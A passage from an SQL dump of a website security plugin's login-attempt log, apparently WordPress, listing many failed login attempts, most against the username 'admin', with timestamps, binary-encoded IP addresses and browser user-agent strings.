Firefox/62.0'),(2872,5175,1628825033.315889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2873,5176,1628825605.531044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2874,5178,1628825932.387957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2875,5179,1628826265.923530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��7D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2876,5181,1628826366.856095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2877,5183,1628826802.165870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2878,5184,1628826922.164057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.i+-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2879,5185,1628827205.047467,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#ގs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2880,5186,1628827371.057868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2881,5190,1628828108.144890,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2882,5191,1628828314.619968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2883,5192,1628828499.048718,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2884,5193,1628828613.628145,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2885,5194,1628828927.266377,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2886,5195,1628828989.413561,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2887,5196,1628829239.672950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q`q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2888,5197,1628829298.269421,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����e3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2889,5198,1628829552.197210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2890,5199,1628829866.755550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֗�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2891,5200,1628829877.552000,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2892,5201,1628830179.503935,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g*:f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2893,5202,1628830492.573009,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2894,5203,1628830686.379822,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2895,5204,1628830809.774230,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2896,5205,1628831057.017836,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2897,5206,1628831122.948808,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���4�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2898,5207,1628831479.363099,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��՘�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2899,5208,1628831575.847999,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��g\\�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2900,5210,1628832052.615824,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2901,5211,1628832116.272222,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2902,5213,1628832717.167787,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|(��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2903,5214,1628832892.259890,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2904,5215,1628833050.091870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2905,5216,1628833333.241919,1,'loginFailInvalidUsername','yilang',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2906,5219,1628833715.339387,1,'loginFailInvalidUsername','junyong',0,'\0\0\0\0\0\0\0\0\0\0��tʡ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2907,5220,1628834034.831343,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2908,5220,1628834034.938573,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2909,5223,1628834972.226656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2910,5223,1628834973.286649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2911,5225,1628835491.919887,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-w�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2912,5228,1628836278.756310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ֻ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2913,5229,1628836604.876624,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2914,5231,1628836931.214600,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2915,5232,1628837205.017431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2916,5234,1628837584.987846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2917,5235,1628837625.994418,1,'loginFailInvalidUsername','wangchao',0,'\0\0\0\0\0\0\0\0\0\0��n- ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2918,5236,1628837912.348784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2919,5237,1628838059.536925,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2920,5239,1628838434.203237,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2921,5240,1628838565.267274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t2~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2922,5240,1628838565.359582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t2~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2923,5241,1628838927.609060,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2924,5241,1628838927.668800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2925,5242,1628839218.328184,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2926,5244,1628839543.877657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2927,5245,1628839849.925918,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��gvX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2928,5246,1628839893.927196,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,X#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2929,5247,1628840193.708710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2930,5248,1628840242.204045,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2931,5249,1628840565.403797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2932,5250,1628840883.565647,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2933,5251,1628841212.097296,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2934,5252,1628841542.884400,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2935,5253,1628841841.382055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2936,5254,1628842194.582487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2937,5255,1628842506.603493,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2938,5256,1628842837.692019,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2939,5258,1628843523.020236,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2940,5261,1628844525.018450,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2941,5263,1628845184.526438,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2942,5264,1628845523.623926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��;u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2943,5265,1628845852.764740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2944,5267,1628846503.804993,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2945,5268,1628846883.658289,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2946,5269,1628847180.914702,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2947,5270,1628847544.452747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2948,5271,1628847866.467881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2949,5271,1628847866.514967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2950,5273,1628848575.877730,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2951,5277,1628851781.929676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2952,5283,1628853984.297157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2953,5284,1628854496.797057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2954,5286,1628855568.441719,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2955,5287,1628855784.764393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2956,5287,1628855784.820357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2957,5288,1628856074.824274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2958,5290,1628857083.430116,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2959,5295,1628859005.940072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2960,5297,1628859907.985977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2961,5300,1628861453.307025,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2962,5301,1628861668.248047,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2963,5301,1628861668.796887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2964,5303,1628862586.693097,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��;u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2965,5305,1628863488.794511,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2966,5308,1628865094.941463,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2967,5308,1628865095.010261,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2968,5312,1628866199.627752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ś�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2969,5313,1628866761.090155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2970,5314,1628866970.516606,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(2971,5315,1628867307.492467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ࣶ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2972,5317,1628869359.087052,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(2973,5319,1628872968.781967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2974,5320,1628874168.441616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_S�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(2975,5323,1628879171.021336,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Hӱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2976,5324,1628879486.608715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2977,5325,1628879803.699682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]�{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2978,5326,1628880128.994586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2979,5327,1628880201.133150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3M�\"','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2980,5328,1628880456.860961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2981,5329,1628880804.592548,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2982,5330,1628881110.990179,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2983,5331,1628881422.423659,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(2984,5332,1628881765.168523,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2985,5333,1628882089.937771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2986,5334,1628882412.137802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2987,5335,1628882768.016418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2988,5336,1628883067.844486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2989,5336,1628883067.886142,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2990,5339,1628883861.558331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(2991,5340,1628884076.416215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2992,5341,1628884395.388034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gPR!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2993,5342,1628884725.784404,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2994,5342,1628884725.818138,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2995,5343,1628885061.195846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2996,5344,1628885100.661904,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νY�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2997,5344,1628885100.735732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νY�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2998,5345,1628885406.112997,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2999,5346,1628885759.480652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6�Y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3000,5347,1628886067.039941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ћ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3001,5348,1628886315.327384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"C��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 